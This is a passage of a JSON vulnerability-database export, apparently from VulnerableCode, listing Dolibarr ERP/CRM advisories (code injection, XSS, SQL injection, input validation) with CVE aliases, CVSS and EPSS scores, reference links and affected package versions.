f66-hp3r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e3km-aqns-kkb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55195?format=json","vulnerability_id":"VCID-e6hj-wmum-tygv","summary":"Dolibarr ERP and CRM Code Injection\nDolibarr ERP/CRM 9.0.1 provides a module named website that provides for creation of public websites with a WYSIWYG editor. It was identified that the editor also allowed inclusion of dynamic code, which can lead to code execution on the host machine. An attacker has to check a setting on the same page, which specifies the inclusion of dynamic content. 
Thus, a lower privileged user of the application can execute code under the context and permissions of the underlying web server.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11201","reference_id":"","reference_type":"","scores":[{"value":"0.00559","scoring_system":"epss","scoring_elements":"0.68541","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11201"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/63c0ab93fb21f86c1b736061af9fa1eee90148fd","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/63c0ab93fb21f86c1b736061af9fa1eee90148fd"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-485841141","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-485841141"},{"reference_url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://know.bishopfox.com/advisories/dolibarr-ver
sion-9-0-1-vulnerabilities"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11201","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11201"},{"reference_url":"https://github.com/advisories/GHSA-jwg3-v9xm-v6q9","reference_id":"GHSA-jwg3-v9xm-v6q9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jwg3-v9xm-v6q9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v
7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/106858?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbb
a"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3"}],"aliases":["CVE-2019-11201","GHSA-jwg3-v9xm-v6q9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e6hj-wmum-tygv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55502?format=json","vulnerability_id":"VCID-enqn-xkv2-nuf5","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM before 10.0.3 has an Insufficient Filtering issue that can lead to user/card.php 
XSS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19211","reference_id":"","reference_type":"","scores":[{"value":"0.02101","scoring_system":"epss","scoring_elements":"0.84342","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19211"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/en/security-advisories/usd-2019-0053","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/en/security-advisories/usd-2019-0053"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19211","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19211"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/115188?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},
{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y4h8-4zpp-qqfn"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/443000?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulner
ability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4"}],"aliases":["CVE-2019-19211","GHSA-gfhf-2xr5-2fvw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-enqn-xkv2-nuf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14732?format=json","vulnerability_id":"VCID-exs6-buy9-zfcn","summary":"Dolibarr 
vulnerable to SQL Injection\nVulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters sortorder and sortfield in /dolibarr/admin/dict.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5314","reference_id":"","reference_type":"","scores":[{"value":"0.00106","scoring_system":"epss","scoring_elements":"0.28431","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5314"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5314","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5314"},{"reference_url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-05-24T13:43:18Z/"}],"url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms"},{"reference_url":"https://github.com/advisories/GHSA-c3h9-q3jx-w7fc"
,"reference_id":"GHSA-c3h9-q3jx-w7fc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c3h9-q3jx-w7fc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulne
rability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"}],"aliases":["CVE-2024-5314","GHSA-c3h9-q3jx-w7fc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-exs6-buy9-zfcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61200?format=json","vulnerability_id":"VCID-fd5f-b8q5-ayf5","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19210","reference_id":"","reference_type":"","scores":[{"value":"0.00606","scoring_system":"epss","scoring_elements":"0.69981","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19210"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0052","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0052"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19210","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:
L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19210"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/115188?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},
{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y4h8-4zpp-qqfn"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"}],"aliases":["CVE-2019-19210","GHSA-87r3-4gc8-f897"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fd5f-b8q5-ayf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50726?format=json","vulnerability_id":"VCID-fvp2-wtsw-y7ee","summary":"Dolibarr vulnerable to Improper Validation of Specified Quantity in Input\nDolibarr 14.0.5 and prior versions are vulnerable to Improper Validation of Specified Quantity in 
Input.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0414","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.5582","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0414"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684"},{"reference_url":"https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0414","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0414"},{"reference_url":"https://github.com/advisories/GHSA-f768-8pvq-mm6r","reference_id":"GHSA-f768-8pvq-mm6r","reference_type":"","scores":[{"value":"MODERATE","sc
